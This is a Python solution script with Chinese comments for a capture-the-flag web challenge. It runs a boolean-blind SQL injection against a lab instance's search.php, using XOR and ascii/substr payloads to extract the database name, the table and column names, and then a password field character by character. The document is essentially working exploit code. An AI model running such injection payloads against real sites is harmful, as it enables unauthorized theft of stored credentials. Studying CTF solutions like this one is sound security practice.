#这里提一下,由于服务器可能会出现429太多请求的错误,会导致脚本测试某些字段匹配不到。建议多跑几次flag。
#这题目里password字段太长了,建议直接从170位到220位测试(小心别踩坑,因为429错误)。
import requests
url = 'http://c3d4ded5-63fb-4d51-b784-e73ad570a432.node3.buuoj.cn/search.php?id=1'
#数据库、表名、字段查询语句
database = 'select(database())'
table = 'select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()'
column = "select(group_concat(column_name))from(information_schema.columns)where(table_name)=('F1naI1y')"
key = 'select(group_concat(password))from(F1naI1y)'
result = ''
for i in range(170,220):
for j in range(32,126):
payload = '^(ascii(substr(({}),{},1))={})'.format(key,i,j)
res = requests.get(url+payload)
print(chr(j))
#如果页面内容中出现ERROR猜测正确
if 'ERROR' in res.text:
result += chr(j)
print(res.url)
print(i)
print(result)
break